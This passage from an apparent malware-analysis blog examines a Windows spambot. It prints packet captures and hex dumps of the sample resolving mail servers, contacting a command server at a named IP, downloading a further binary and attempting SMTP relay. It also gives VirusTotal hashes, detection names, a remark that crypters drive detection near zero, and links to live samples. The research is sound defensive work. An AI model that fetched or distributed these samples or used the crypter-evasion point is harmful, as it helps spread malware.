E 3F 93 7F C5 A1 0F EB 71 DD BB 07 ED 49 DD DF 46 A1 0A ..
 98 20 AE 13 78 C2 61 80 40 28 B9 3F C9 ED 76 CB 33 83 F..
45 AE 13 88 EB 5F E6 36 5A B6 64 8A 7B 4E 87 70 D7 DF 6D..
7 26 84 E0 70 CE 21 AE F9 42 A0 39 F7 A0 1D C9 17 96 F4 ..
 A7 18 67 DE 61 B9 12 75 C8 3B 91 1A 7D 95 62 CB B1 0F 8..
5D F7 93 4D E7 52 6D 5D 35 CF 6B 05 06 4D D7 72 0D A7 43..
9 11 76 C1 6F 8A F3 40 D2 3B 90 EF 4B A6 57 8A E6 5C B9 ..
 06 A1 3B D7 75 0D A7 43 22 86 13 AF F1 E5 7F 1B B5 51 E..
48 AF 42 B0 3C 1B AE 24 A0 76 1A C4 14 E3 86 8F F7 02 F2..
3 BE 49 F5 7F 1B B5 53 EB 87 25 BD 57 F3 8D 29 C3 5F FD ..
 35 D1 6B 07 A1 3D D7 73 0D A9 43 DF 79 15 AF 4B E5 81 1..
BD 57 F3 CD 29 C3 1F D7 F1 4E BF 04 01 9B 37 05 6A 07 A3..
3 DF 79 15 AF 4B E5 81 1B B7 51 ED 87 23 BD 59 F3 8F 29 ..
 65 01 9B 37 D1 6D 07 A3 3D D9 73 0F A9 45 DF 7B 15 B1 4..
     :                                  :
B7 30 F1 F6 58 E5 08 6C FC 5F B2 43 67 C6 11 AC 06 05 C8.. 
8 8E F3 7E DB 36 9E E6 45 DC 38 87 EA 05 AA 13 9C 9D 52 5..
 05 40 A8 3F F4 59 2F E2 45 E1 7B 17 B6 4D E7 83 38 EB 1 ..
AA D8 64 97 25 F1 B2 63 83 23 5C CA 76 81 2B 29 80 6D 95..
2 59 F4 1F B8 CF 52 FE 1A A1 B8 25 BF 5B 13 EE 7C A8 AE 7..
 EA 6D A5 3E 4C AF 12 B4 55 79 DF 33 91 47 38 9C 3D 86 E ..
25 BF 3D D1 A9 D7 8D 61 FD 97 33 40 4E 03 9C 39 D5 6F 4F2..
6 60 E1 7E 17 B3 4D BA C2 79 DF 3A 9D EF 44 A3 37 92 B1 E..
 B8 1B 62 F1 5A B0 4F 5F CA 25 BA 0E 1B F8 37 C3 29 76 9..
55 EF FB 56 AC 2F 87 CE 59 A6 10 96 99 33 CF 69 05 9F C1..
B 77 11 AC 47 E3 7D 5B FF 0E A7 CE 1F FE 75 C0 AB 11 F1 ..

What networking / what kind of spam activities?

Malware grabs your IP & gateway hostname, by reversing your IP ARPA record, and then ask every MX record possibilities of every possible subdomains:
24  256.711421  TestPC  8.8.8.8  DNS  Standard query PTR 105.83.110.xxx.in-addr.arpa
25  256.850845  8.8.8.8  TestPC  DNS  Standard query response PTR p6e5369.sitmnt01.ap.MyDomain
429  270.887803  TestPC  8.8.8.8  DNS  Standard query A smtp.p6e5369.sitmnt01.ap.MyDomain
431  270.966472  TestPC  8.8.8.8  DNS  Standard query A mail.p6e5369.sitmnt01.ap.MyDomain
435  271.254438  TestPC  8.8.8.8  DNS  Standard query A sitmnt01.ap.MyDomain
437  271.332410  TestPC  8.8.8.8  DNS  Standard query A smtp.sitmnt01.ap.MyDomain
439  271.410546  TestPC  8.8.8.8  DNS  Standard query A mail.sitmnt01.ap.MyDomain
441  271.489836  TestPC  8.8.8.8  DNS  Standard query MX sitmnt01.ap.MyDomain
443  271.571450  TestPC  8.8.8.8  DNS  Standard query A ap.MyDomain
451  273.886911  TestPC  8.8.8.8  DNS  Standard query A smtp.ap.MyDomain
453  273.974856  TestPC  8.8.8.8  DNS  Standard query A mail.ap.MyDomain
455  274.052129  TestPC  8.8.8.8  DNS  Standard query MX ap.MyDomain
456  274.148586  8.8.8.8 TestPC  DNS  Standard query response MX 100 mailgate.MyDomain
457  274.149148  TestPC  8.8.8.8  DNS  Standard query A mailgate.MyDomain
Then, it searched for microsoft.com's, yahoo.com's, google.com's & mailru's MX info.
000002B0  e2 68 01 00 00 01 00 00  00 00 00 00 09 6d 69 63 .h...... .....mic
000002C0  72 6f 73 6f 66 74 03 63  6f 6d 00 00 0f 00 01    rosoft.c om.....

000002CF  61 15 01 00 00 01 00 00  00 00 00 00 04 6d 61 69 a....... .....mai
000002DF  6c 09 6d 65 73 73 61 67  69 6e 67 09 6d 69 63 72 l.messag ing.micr
000002EF  6f 73 6f 66 74 03 63 6f  6d 00 00 01 00 01       osoft.co m.....

00000329  78 9f 01 00 00 01 00 00  00 00 00 00 05 79 61 68 x....... .....yah
00000339  6f 6f 03 63 6f 6d 00 00  0f 00 01                oo.com.. ...

00000344  fb ec 01 00 00 01 00 00  00 00 00 00 04 6d 74 61 ........ .....mta
00000354  37 03 61 6d 30 08 79 61  68 6f 6f 64 6e 73 03 6e 7.am0.ya hoodns.n
00000364  65 74 00 00 01 00 01                             et.....

00000398  33 17 01 00 00 01 00 00  00 00 00 00 06 67 6f 6f 3....... .....goo
000003A8  67 6c 65 03 63 6f 6d 00  00 0f 00 01             gle.com. ....

000003B4  a4 49 01 00 00 01 00 00  00 00 00 00 05 61 73 70 .I...... .....asp
000003C4  6d 78 01 6c 06 67 6f 6f  67 6c 65 03 63 6f 6d 00 mx.l.goo gle.com.
000003D4  00 01 00 01 

0000045C  2a 50 01 00 00 01 00 00  00 00 00 00 04 6d 61 69 *P...... .....mai
0000046C  6c 02 72 75 00 00 0f 00  01                      l.ru.... .

00000475  fd 90 01 00 00 01 00 00  00 00 00 00 03 6d 78 73 ........ .....mxs
00000485  04 6d 61 69 6c 02 72 75  00 00 01 00 01          .mail.ru .....
in additional it tried to connect to "static.203.81.4 0.188.clients.yo ur-server.de"
000008FA  80 a5 81 80 00 01 00 01  00 00 00 00 03 32 30 33 ........ .....203
0000090A  02 38 31 02 34 30 03 31  38 38 07 69 6e 2d 61 64 .81.40.1 88.in-ad
0000091A  64 72 04 61 72 70 61 00  00 0c 00 01 c0 0c 00 0c dr.arpa. ........
0000092A  00 01 00 00 a8 be 00 2d  06 73 74 61 74 69 63 03 .......- .static.
0000093A  32 30 33 02 38 31 02 34  30 03 31 38 38 07 63 6c 203.81.4 0.188.cl
0000094A  69 65 6e 74 73 0b 79 6f  75 72 2d 73 65 72 76 65 ients.yo ur-serve
0000095A  72 02 64 65 00                                   r.de.
0000095F  80 a5 81 80 00 01 00 01  00 00 00 00 03 32 30 33 ........ .....203
0000096F  02 38 31 02 34 30 03 31  38 38 07 69 6e 2d 61 64 .81.40.1 88.in-ad
0000097F  64 72 04 61 72 70 61 00  00 0c 00 01 c0 0c 00 0c dr.arpa. ........
0000098F  00 01 00 00 a8 bc 00 2d  06 73 74 61 74 69 63 03 .......- .static.
0000099F  32 30 33 02 38 31 02 34  30 03 31 38 38 07 63 6c 203.81.4 0.188.cl
000009AF  69 65 6e 74 73 0b 79 6f  75 72 2d 73 65 72 76 65 ients.yo ur-serve
000009BF  72 02 64 65 00                                   r.de.
The next thing is it established connection to 188.40.81.203 via remote-as Test PC←→188.40.81.203 via TCP/2053(remote-as) ⇒36063 Seq=142 Ack=258 Win=16687 Len=1412
000004AD  51 a4 30 4e fc 53 fe b5  61 b5 1c bc b8 40 d0 6e Q.0N.S.. a....@.n
000004BD  14 53 dc c7 9a 14 36 e1  33 74 de d7 d7 c1 ae 52 .S....6. 3t.....R
000004CD  34 c6 d3 53 08 16 4f 95  d2 a1 2c ca 1e ce fa 38 4..S..O. ..,....8
000004DD  16 27 31 e8 a8 09 fb c3  e6 df d2 2f 72 86 6a e0 .'1..... .../r.j.
000004ED  97 27 bc ce 43 9d 36 1b  1e 9a 46 42 52 0a 0b d6 .'..C.6. ..FBR...
000004FD  9f b2 8e 3f 87 e9 75 8b  ba 83 da f8 d7 0c 68 85 ...?..u. ......h.
0000050D  7b d9 4c 5f 85 a8 52 48  c1 7f 9d a7 89 87 64 0d {.L_..RH ......d.
0000051D  0f 21 83 d1 dc 71 1e c8  19 58 8d 26 de 7e 6e e7 .!...q.. .X.&.~n.
0000052D  ff 9d 0e 23 7f 9a 63 75  7f e3 3a ed 43 37 93 f3 ...#..cu ..:.C7..
0000053D  10 63 3d 53 a4 c6 d9 29  51 a6 69 e1 89 dc db 70 .c=S...) Q.i....p
0000054D  65 1d ea 7e ef 1c de a0  3a ab 3d da 4b eb 2b c3 e..~.... :.=.K.+.
0000055D  20 56 a4 86 95 54 5b cd  98 7d ae 4c a3 13 74 92  V...T[. .}.L..t.
0000056D  b5 53 da ff ce 6a 07 2a  18 ec 54 cd 5c bc ca cd .S...j.* ..T.\...
0000057D  bd e2 19 49 39 5d a0 14  c7 66 6b 3d da 80 a4 33 ...I9].. .fk=...3
0000058D  a7 e0 fe 7d b2 c1 83 d3  cb 3c 1f 88 8d 02 a3 52 ...}.... .<.....R
0000059D  84 fb ff ee 0d fe 28 7a  37 8f b1 76 92 74 ee c7 ......(z 7..v.t..
000005AD  e8 e0 07 d0 37 93 81 a2  9d 13 c5 f7 f5 48 fd e4 ....7... .....H..
000005BD  36 54 7a 41 8c a7 72 3f  dc af 1b ff b6 fd 9e 01 6TzA..r? ........
000005CD  81 d4 ad 49 a0 74 c5 f7  0f ca 6a f8 7c 71 35 75 ...I.t.. ..j.|q5u
000005DD  3e 24 20 0f 1f 36 5e b4  89 54 77 91 e3 f2 92 bf >$ ..6^. .Tw.....
000005ED  d3 63 1a 5e ef a2 7c 83  7c 43 9c 58 7a ea e8 fe .c.^..|. |C.Xz...
000005FD  48 eb cb 67 66 03 9e 7d  bb 71 b1 35 b4 fe f3 57 H..gf..} .q.5...W
0000060D  17 33 2b 9b                                      .3+.
00000611  e3 37 a9 bd 15 0c 6b f7  54 67 2f 12 ee de 30 79 .7....k. Tg/...0y
00000621  17 b7 46 a7 55 98 65 34  59 c9 1b e5 19 6b 94 a9 ..F.U.e4 Y....k..
00000631  55 bd 9f d3 28 6c ae 94  94 7d e0 35 7c bd ca 16 U...(l.. .}.5|...
00000641  e0 27 fd 49 8e ce 48 1d  e7 f8 65 c0 f9 39 94 0e .'.I..H. ..e..9..
00000651  4a 0d 91 ee 3c e7 9b 83  86 d2 a6 29 00 4a f8 50 J...<... ...).J.P
00000661  03 11 68 08 f6 a4 3a 8a  cb f1 b0 f0 5e e3 78 44 ..h...:. ....^.xD
00000671  cc e7 ce 68 e1 f5 d5 ab  98 1a 73 08 fa f2 4c 1c ...h.... ..s...L.
00000681  ca 01 dd e6 13 61 01 9b  83 b8 66 3c 86          .....a.. ..f<.
0000068E  1f 5c 26 ed 03 ab b2 07  77 f6 01 06 84 cf 53 1f .\&..... w.....S.
0000069E  68 82 33 35 dd 64 d8 e0  c7                      h.35.d.. .
    00000101  bb 06 46 52 d6 59 2e aa  d1 72 03 28 2b b5 c1 98 ..FR.Y.. .r.(+...
    00000111  4d 1d 88 49 74 c2 46 e0  48 43 97 d5 b5 97 ef af M..It.F. HC......
    00000121  00 c4 8b 93 65 98 69 0a  5c 78 72 44 9f c3 40 99 ....e.i. \xrD..@.
    00000131  71 69 e3 56 7b 09 b3 fe  f4                      qi.V{... .
000006A7  c0 7f 48 a1 64 70 23 1d  03 eb 9f 07 2b de da 3c ..H.dp#. ....+..<
000006B7  a4 8b 4b 16 ea e7 9a ea  65 62 6b 2e af 67 bb eb ..K..... ebk..g..
000006C7  79 a8 f1 3a 34 da ab 7a  56 84 dd 9c 27 0c 6d 72 y..:4..z V...'.mr
000006D7  a5 35 a4 55 71 d3 e7 3c  aa 6e 30 af 6a 94 00 58 .5.Uq..< .n0.j..X
000006E7  58                                               X
000006E8  b5 e9 21 3b f8 10 ad 44  3d 05 ca e0 c1 a1 22 4d ..!;...D =....."M
000006F8  dd 9b 3c 25 26 27 28 29  10 32 42                ..<%&'() .2B
00000703  96 13 31 92 e1 a5 35 d9  b3 42 d7 6c 67 d0 0b 30 ..1...5. .B.lg..0
00000713  c9 5b 8a 81 a8 1f 33 a3  00 ec 5d 68 28 59 52 0e .[....3. ..]h(YR.
00000723  ef e2 90 e4 75 9d 79 2c  56 22 41 4a d0 07 fe f8 ....u.y, V"AJ....
00000733  dc fb 07 5a d5 be 5d c8  08 14 b8 1b f0 6c 1d 4c ...Z..]. .....l.L
00000743  dc 85 ec 76 83 5a 0f 67  52 0b 36 84 08 a2 0a ba ...v.Z.g R.6.....
00000753  58 97 77 24 c3 62 c2 86  fc dd 99 5a d7 8c 61 3a X.w$.b.. ...Z..a:
00000763  74 46 1e 85 76 e8 74 2b  ed 18 3d cb 75 d0 e8 c8 tF..v.t+ ..=.u...
00000773  d5 ed c2 53 d8 e7 d5 42  52 44 58 b3 33 c2 bf 90 ...S...B RDX.3...
00000783  19 44 bc 9c 3e c3                                .D..>.
00000789  7b f7 c4 e5 d8 5c 84 05  0a 11 80 96 45 91 d5 3d {....\.. ....E..=
00000799  64 96 12 90 47 47 76 89  de 6a 90 45 8e 09 34 19 d...GGv. .j.E..4.
000007A9  c6 ef 7e 3d 6e 3e 6a 1b  c2 27 4c 28 32 97 ee 35 ..~=n>j. .'L(2..5
000007B9  4a ff                                            J.
000007BB  22 45 43 25 a6 8a 4a 6a  11 cf b2 09 a0 8a 2d 98 "EC%..Jj ......-.
000007CB  dd ad f0 a2 35 c0 3b 45  62 49 95 51 e1          ....5.;E bI.Q.
000007D8  93 4d 90 ae fb c6 78 08  17 6b ec 92 72 3c b6 01 .M....x. .k..r<..
000007E8  f2 9e 51 1a 36 6e 56 7f  82                      ..Q.6nV. .
    0000013A  06 13 2b 00 91 16 25 13  80 90 82 96 f0 71 00 fd ..+...%. .....q..
    0000014A  ce ef 9a fa da 7c 01 a0  35                      .....|.. 5
IF the connection established, it gives you download OTHER malicious binary:
// Sending another malware shits via below TCP follows.....
    00000000  7c fd 5e eb 50 b2 cc e1  b8 6a f0 6b fd 65 9d 9a |.^.P... .j.k.e..
    00000010  60 ab 6a f7 1d a3 14 e4  6d d9 b3 8a 30 94 9c 4e `.j..... m...0..N
    00000020  0f c3 eb e5 8a 49 42 31  73 66 f2 fc 51 cc f5 9a .....IB1 sf..Q...
    00000030  ed ff 54 37 93 7e d3 30  e6 58 4d f7 f5 56 c4 d7 ..T7.~.0 .XM..V..
    00000040  dd d4 dc 30 80 b0 4e bf  85 f7 d0 66 5b 12 77 e8 ...0..N. ...f[.w.
    00000050  ec 3e c6 b1 ff de 8a f7  e1 35 a6 e7 da 61 91 9b .>...... .5...a..
    00000060  67 fd d3 14 ed 59 44 d5  75 8f da a4 1a 8c f3 0f g....YD. u.......
    00000070  9f 60 65 0b d7 2a cc 7a  4b 88 7d a7 6d ee da 0b .`e..*.z K.}.m...
    00000080  66 05 1e c6 08 76 85 1a  e6 05 16 86 1a e6 01 3e f....v.. .......>
    00000090  11 cd c2 6b 63 5d 23 9b  bf c4 3f 74 2f 85 bd bc ...kc]#. ..?t/...
    000000A0  bb a3 ac 45 b5 f2 38 ea  82 4b fd 19 24 bb 9c 24 ...E..8. .K..$..$
    000000B0  0f 72 61 1b 42 e0 eb 6b  a6 01 83 ac 9f 97 67 30 .ra.B..k ......g0
    000000C0  1a 8b 21 68 a3 cf 3c 65                          ..!h.../. O ....H.
00000050  b6 73 90 d8 c0 2a 44 68  c0 b9 06 30 a4 71 ac e4 .s...*Dh ...0.q..
00000060  6a 24 71 3b e3 fd fb a2  e1 b3 4d 6b 1e 48 d6 b5 j$q;.... ..Mk.H..
00000070  ed a2 75 e0 7f 2a 2a 32  77 11 c1 ce f6 a0 a5 f4 ..u..**2 w.......
00000080  5a c6 be db c7 65 e1 90  f6 f1 8d 22 77          Z....e.. ..."w
    000000C8  8a 67 53 49 ac 26 54 e0  4c 80 c0 80 39 ea f0 9f .gSI.&T. L...9...
    000000D8  d6 76 1f 8a 7d 9f 86 24  5d 93 f3 a1 e9 ea e5 f0 .v..}..$ ].......
    000000E8  00 a4 a8 f2 ee 4a df 62  fe 92 b8 c7 99 c5 a2 22 .....J.b ......."
    000000F8  b0 4c 72 ce 48 f0 5f 76  a4                      .Lr.H._v .
0000008D  30 a0 fe 41 28 42 c9 0a  07 24 e9 83 d3 30 2e 99 0..A(B.. .$...0..
0000009D  49 e8 9a 3b e3 a6 2a bb  b5 48 dd 7c 1f 5f 09 b7 I..;..*. .H.|._..
000000AD  3c ce af 72 8a 19 39 da  2b 9e 13 26 44 8a af ab <..r..9. +..&D...
000000BD  13 f8 1f ee f1 d8 d5 b1  79 de 6d ba 95 00 57 36 ........ y.m...W6
000000CD  bc cb 09 2b 8f 1b 0f 22  ee af 00 fc f8 93 e0 03 ...+..." ........
000000DD  df 40 d0 61 19 bc 9a 4e  8f 36 e1 6e 63 af d6 b0 .@.a...N .6.nc...
000000ED  83                                               .
000000EE  15 42 9d 01 e0 72 ba 69  b7 e2 d6 7c 52 09 35 2d .B...r.i ...|R.5-
000000FE  55 eb dd 58 f9 1a 54 15  40                      U..X..T. @
    00000101  c5 05 bd 7f 78 8e 6e 8f  e5 e1 be 2d df 2c 0e 4f ....x.n. ...-.,.O
    00000111  03 7e 00 a9 0c 48 fb b6  b3 83 de 94 2a b1 86 cf .~...H.. ....*...
    00000121  b9 06 81 2c c6 fd 70 aa  e7 71 fb 23 3e fb 56 5e ...,..p. .q.#>.V^
    00000131  70 4d a3 1e 48 d6 b5 1d  70                      pM..H... p
00000107  d3 88 2c cc 87 27 d7 0b  21 41 73 26 78 6a ba 77 ..,..'.. !As&xj.w
00000117  ca 96 47 e2 8d 04 db 8b  c1 c8 93 05 95 4d f0 88 ..G..... .....M..
00000127  6a 2c 7e 93 f8 00 96 1e  8c 5f 67 ab 74 19 b8 4e j,~..... ._g.t..N
00000137  72 91 d6 ab 8e 47 47 7a  89 80 2c 17 63 2d ca 48 r....GGz ..,.c-.H
00000147  ff                                               .
00000148  f5 d4 8e 07 95 27 39 a1  87 7b 27 cb ae 1b ea 39 .....'9. .{'....9
00000158  88 10 ea 4b 95 1a ce ac  59                      ...K.... Y
    0000013A  35 e1 7f 2a 6a 33 77 11  b1 e7 4d ef a4 f6 5a c6 5..*j3w. ..M...Z. <==== See this? A PE file...
    0000014A  be 63 df 65 e1 90 f6 f1  8d 3b 77 78 a0 89 32 3f .c.e.... .;wx..2?
    0000015A  30 ac 69 20 82 8f ef d2  32 2e 99 49 50 f8 61 93 0.i .... 2..IP.a.
    0000016A  56 36 ba b5 49 dd db 69  28 65 c5 57 91 f1 20 d6 V6..I..i (e.W.. .
    0000017A  33 13 f0 01 b4 39 0c 6e  5a 65 90 b7 5d 6b 80 92 3....9.n Ze..]k..
    0000018A  ac bf 12 05 fd 1f df f6  6e 30 58 d5 dd 0f 26 89 ........ n0X...&.
    0000019A  57 46 6e a3 85 d0 d1 d2  b9 ca 29 f5 85 34 89 d8 WFn..... ..)..4..
    000001AA  2b dd 6e e7 42 95 1e 10  96 f9 9f eb 7c 32 ee 64 +.n.B... ....|2.d
    000001BA  92 04 d3 0a d2 cc ba 15  25 6c 1b 4e 3a 3e ea 3f ........ %l.N:>.?
    000001CA  9c 6e 3c 7c 30 d5 fb 5e  aa 90 41 be 6f ad 23 c0 .n<|0..^ ..A.o.#.
    000001DA  b9 51 1e d6 0f e3 71 00  c4 e4 60 e6 d4 9e be bb .Q....q. ..`.....
    000001EA  66 fc 29 d9 d7 35 0a 13  f8 8c 3d e4 6b a1 0d 32 f.)..5.. ..=.k..2
    000001FA  8d 12 6b 85 2f 07 f5 bf  c4 a8 24 7a 4b 83 f0 0c ..k./... ..$zK...
    0000020A  7f 0a 5d ac 3a 8b 9a bf  eb 69 b5 4f 50 d1 e1 09 ..].:... .i.OP...
    0000021A  53 a4 c4 7e 84 03 aa 88  d0 41 e5 3a af d9 3d 79 S..~.... .A.:..=y
    0000022A  e3 58 e6 a5 a6 ff ed af  4b 75 86 7f b1 ce 63 f6 .X...... Ku....c.
    0000023A  75 8b 65 39 34 47 18 97  fa ff 95 f9 b2 89 20 b5 u.e94G.. ...... .
    0000024A  a4 e8 d4 e5 a6 77 b2 dd  15 61 c7 3b 0a f5 6f 3a .....w.. .a.;..o:
    0000025A  40 87 8f 9c d9 39 f6 97  36 6d 5a 6e 6d 03 49 de @....9.. 6mZnm.I.
    0000026A  b5 f2 ae 5f 18 eb 9d 66  ee 5f e0 2f 10 90 d1 fd ..._...f ._./....
    0000027A  b5 68 e1 36 e6 5b ba 3d  50 57 d6 c7 7e a8 96 e6 .h.6.[.= PW..~...
       :                :                       :                    :
    000511DD  f8 dc 2c bf c6 fe d4 42  40 ed 52 2f af 4c d3 b2 ..,....B @.R/.L..
    000511ED  52 46 02 49 ce d1 5d 62  27 85 a8 a6 a5 10 d6 aa RF.I..]b '.......
    000511FD  1f 6a b9 cf 3b 0d 1f e5  61 cb c7 d9 8e a8 ca 75 .j..;... a......u
    0005120D  11 86 64 6b 65 f5 23 e0  65 9e 03 18 e2 43 12 ec ..dke.#. e....C..
    0005121D  80 4c ca ad 88 78 c7 b1  7c 1a 33 44 77 fc a1 e1 .L...x.. |.3Dw...
    0005122D  5f 2a ad 14 0c a3 73 80  77 e1 e8 46 f8 7c 42 ae _*....s. w..F.|B.
    0005123D  35 5d 33 d5 19 23 fd 01  d3 fe                   5]3..#.. ..
The binary also made you communicate with 188.40.81.203 via SMTP protocol..
// Atempt to establish the SMTP connection from 188.40.81.203 to Infected PC
422   269.987058 188.40.81.203 TestPC TCPsmtp > neod1 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
0000  00 a0 c9 22 b0 ee 00 12  f0 e9 3e 3e 08 00 45 00   ...".... ..>>..E.
0010  00 30 23 30 40 00 80 06  e1 c3 c0 a8 07 54 da 6e   .0#0@... .....T.n
0020  53 69 04 17 00 19 20 e7  9f e9 00 00 00 00 70 02   Si.... . ......p.
0030  40 00 88 4a 00 00 02 04  05 b4 01 01 04 02         @..J.... ......  
The picture of the PCAP analysis (click to enlarge): You can download the PCAP data in the link provided at he bottom of this page :-) ↑If you see all of the previously mentioned captured network traffic, you'll know this malware is a positive spambot. But not only that, it tried to access your PC via TCP/1053 a remote protocol for the remote controls. Thus, as a bonus it sends you additional malicious code. Practically it uses your PC as a remote spam relay traffic, those spam emails will be relayed into your nearest mail server if exist, or will use other mail servers to relay the spam. Evil enough isn't it? (again, see the text report in the dropbox url above for the details)

Malware Detection Reference Analysis

Virus Total is providing you a very good base of detection ratio for the new- malware, to measure the response of the AntiVirus products against new threat. I often use VT as reference for the timely monitoring purpose of malware detection. At the time this sample was detected, VT of the malware binary score was 3/44
MD5: 268bece218187c189c2322d6f7d21efb File size: 146.4 KB ( 149879 bytes ) File name: unixfreaxjp-sample3 File type: Win32 EXE Detection : 3 / 44 Analysisdate: 2012-11-16 14:02:11 UTC ( 0 分 ago ) URL ---->>>>>>>[CLICK]
@Xylit0l was uploading the unpacked binary, which detected with VT: 27 / 44
MD5: 09a18c6e09bb880922e9ed451d6eb6a0 File size: 68.0 KB ( 69632 bytes ) File name: Dumpedfinal_.exe File type: Win32 EXE Tags: peexe Detection: 27 / 44 Analysis date: 2012-11-17 07:13:25 UTC ( 1 時間, 23 分 ago ) URL ---->>>>>>>>[CLICK]
↑But the detection malware names is so confusing, Not one of those mentioned the SpamBot at all↓
MicroWorld-eScan : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
McAfee           : Artemis!09A18C6E09BB
K7AntiVirus      : Trojan-Downloader
F-Prot           : W32/Bloop.A.gen!Eldorado
Symantec         : Infostealer
Norman           : W32/Malware
TotalDefense     : Win32/Tofsee!generic
Kaspersky        : HEUR:Trojan.Win32.Generic
BitDefender      : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
Sophos           : Sus/Behav-169
F-Secure         : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
DrWeb            : Trojan.Spambot.11176
VIPRE            : BehavesLike.Win32.Malware.eah (mx-v)
AntiVir          : TR/Hijacker.Gen
McAfee-GW-Edition: Artemis!09A18C6E09BB
Emsisoft         : Gen:Win32.ExplorerHijack.eqX@aWv8eAi (B)
ESET-NOD32       : a variant of Win32/Agent.OBA
Kingsoft         : Win32.Troj.Undef.(kcloud)
Microsoft        : Backdoor:Win32/Tofsee.F
AhnLab-V3        : Spyware/Win32.Generic
GData            : Gen:Win32.ExplorerHijack.eqX@aWv8eAi
Commtouch        : W32/Bloop.A.gen!Eldorado
ByteHero         : Virus.Win32.Heur.c
PCTools          : Trojan-PSW.Generic!rem
Rising           : Backdoor.Tofsee!2B2B
AVG              : unknown virus Win32/DH{AAkP}
Panda            : Trj/CI.A
We must learn that a malware with 27/44 detection ratio can be packed with crypter into a different binary to get almost zero detection for the infection purpose. [POINT!] I also uploaded obfuscated exploit kit's JavaScript infector to VT, And with no shocky, as per expected, to realize the score was only 0/44:
MD5: 4396ab2186b4358e2698c1665a16298d File size: 5.0 KB ( 5130 bytes ) File name: sample2 File type: HTML Detection: 0 / 44 Analysisdate: 2012-11-17 07:45:09 UTC ( 0 分 ago ) URL ---->>>>>>>>[CLICK]
↑So this is why so many people got infected easily. If we count this infection time well, it was compiled in 15th, and this was started to be exposed it on 16th-17th. Don't you wonder, how many people got infected by this malware within undetected period 2+(two) days?

Resources and samples

For the research and study purpose we decided to share our analysis data, as per written in the below details. Use these data well to analysis this malware - by yourself, and kindly inform us if you find another result by commenting to this - blog. The sample can be downloaded here -->>[CLICK] The unpacked sample (thanks2 @Xylit0l) can be downloaded here -->>[CLICK] The PCAP/Network Traffic can be downloaded here -->>[CLICK] While the full regshot data can be downloaded here -->>[CLICK]

Reference & studies

Anubis sandbox result (not so useful) is here -->>[CLICK] Comodo sandbox result (not so useful) is here -->>>[CLICK]
#MalwareMustDie!!!